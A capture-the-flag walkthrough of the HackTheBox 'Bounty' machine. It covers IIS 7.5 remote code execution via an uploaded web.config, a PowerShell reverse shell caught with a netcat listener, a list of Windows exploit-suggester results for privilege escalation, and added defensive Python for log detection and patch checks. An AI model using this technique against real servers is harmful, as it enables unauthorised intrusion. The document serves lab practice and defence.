Bounty is a Windows box with IP 10.10.10.93. It’s been a while since I did a windows box. This box taught me some important powershell one liners which can be used to upload strings and files.
Initial Analysis
Doing a basic port scan.
```
┌──(kali㉿kali)-[~/HackTheBox/Bounty/10.10.10.93/nmap]
└─$ cat Basic_10.10.10.93.nmap
# Nmap 7.91 scan initiated Wed Feb 17 02:36:57 2021 as: nmap -Pn -sCV -p80 -oN nmap/Basic_10.10.10.93.nmap 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.33s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 02:37:13 2021 -- 1 IP address (1 host up) scanned in 16.30 seconds
```
MS IIS 7.5. I have some previous experience dealing with IIS servers; let's add the host to the hosts file.
I will be able to upload files to the server, nice. Is there any RCE based on file uploads in IIS 7.5? A quick search landed me on a blog post showing that uploading a web.config file containing ASP code can be used to execute remote commands.
Exploit
The first step will be to confirm whether I can upload a web.config file and check if RCE is possible. Once uploaded, the config file might be present in the uploadedfiles directory.
Yeah!! It works. Time to pop a reverse shell. I will be using PowerShell for this. I tried different payloads; the implementation from nishang worked. Added a line to invoke the shell at the end.
```
┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ nc -nvlp 4242
listening on [any] 4242 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.93] 49168
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>cd C:\Users\merlin\Desktop
PS C:\Users\merlin\Desktop> type user.txt
```
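From the defender's side, the technique above leaves a clear trace: IIS request filtering normally refuses to serve web.config (404 with substatus 8), so a 2xx answer for a web.config inside a user-writable upload directory means an uploaded config was reached. This is an added example, not part of the writeup; the W3C log lines are constructed and the `uploadedfiles` path is the one the text names.

```python
# Constructed sample of an IIS 7.5 W3C log (not captured from the box); the
# /uploadedfiles/web.config entry answering 200 mirrors the check described above.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-02-17 07:40:01 10.10.10.93 GET / - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 120
2021-02-17 07:40:09 10.10.10.93 POST / - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 310
2021-02-17 07:40:15 10.10.10.93 GET /uploadedfiles/web.config - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 45
2021-02-17 07:41:02 10.10.10.93 GET /web.config - 80 - 10.10.14.9 curl/7.74 404 8 0 2
2021-02-17 07:42:30 10.10.10.93 GET /uploadedfiles/logo.png - 80 - 10.10.14.5 Mozilla/5.0 200 0 0 12
"""


def parse_iis_log(text):
    """Yield one dict per entry, using the #Fields directive as column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):  # skip entries with embedded spaces we cannot split safely
            yield dict(zip(fields, parts))


def find_served_config_files(text, upload_dirs=("/uploadedfiles/",)):
    """Return entries where a web.config under an upload directory was served with 2xx.

    Request filtering treats web.config as a hidden segment and answers 404.8,
    so a success status here means the uploaded config was reachable and any
    handler mapping it declares could have executed.
    """
    hits = []
    for entry in parse_iis_log(text):
        stem = entry["cs-uri-stem"].lower()
        if not stem.endswith("/web.config"):
            continue
        if not any(stem.startswith(d) for d in upload_dirs):
            continue
        if entry["sc-status"].startswith("2"):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for h in find_served_config_files(SAMPLE_LOG):
        print(f"{h['date']} {h['time']} {h['c-ip']} -> {h['cs-uri-stem']} ({h['sc-status']})")
```

The same upload directory is where the hardening belongs: locking configuration overrides for that path in applicationHost.config stops a dropped web.config from adding handlers in the first place.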
Owned user, moving on to root.
PrivEsc
Let's get the system info and check it with windows-exploit-suggester.
```
Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          3/27/2021, 9:51:36 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,676 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,369 MB
Virtual Memory: In Use:    726 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93
```
Checking with the exploit suggester, I learned that we have multiple ways to do privesc.
```
┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ cat exploitsuggester.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
```
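The comparison windows-exploit-suggester performs, reduced to the bulletins listed above, as an added example that is not part of the writeup: parse `systeminfo` output, pull the build number and installed KB list, and report which of those bulletins' KBs are absent. The unpatched excerpt follows the output above; the patched one is constructed to show the multi-line hotfix form.

```python
import re

# Constructed excerpt in the shape of the systeminfo output above (unpatched host).
SYSTEMINFO_NONE = """\
Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""

# Constructed excerpt of a patched host; the [NN]: KBxxxxxx lines are how
# systeminfo lists installed hotfixes when there are any.
SYSTEMINFO_PATCHED = """\
Host Name:                 EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
"""

# Bulletin -> KB article, taken from the exploit-suggester output above.
BULLETIN_KB = {
    "MS10-059": "982799",   # Tracing feature for services EoP
    "MS11-011": "2393802",  # Windows kernel EoP
    "MS10-073": "981957",   # Kernel-mode drivers EoP
    "MS10-047": "981852",   # Windows kernel EoP
    "MS13-005": "2778930",  # Kernel-mode driver EoP
}


def parse_systeminfo(text):
    """Return (key/value fields, list of installed KB numbers as strings)."""
    fields, kbs = {}, []
    for line in text.splitlines():
        m = re.match(r"\s+\[\d+\]:\s*KB(\d+)", line)
        if m:  # continuation line of the Hotfix(s) block
            kbs.append(m.group(1))
            continue
        if ":" in line:
            key, _, val = line.partition(":")
            fields[key.strip()] = val.strip()
    return fields, kbs


def patch_report(text, bulletins=BULLETIN_KB):
    """Summarise build level and which of the listed bulletins have no KB installed."""
    fields, kbs = parse_systeminfo(text)
    m = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    build = int(m.group(1)) if m else None
    return {
        "host": fields.get("Host Name"),
        "build": build,
        "has_sp1": build is not None and build >= 7601,  # 6.1 SP1 is build 7601
        "missing": sorted(b for b, kb in bulletins.items() if kb not in set(kbs)),
    }
```

This checks only the KBs in the small table, not the suggester's full database, so an empty `missing` list means "none of these", not "fully patched".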
Trying each exploit to check whether any of them work, MS10-059 did. To upload the executable, I had to traverse to a directory which allowed creation of a file.
```
C:\Users\merlin\AppData\Local\Temp
```
Now let's modify the config file to upload the file and save it to the above-mentioned directory.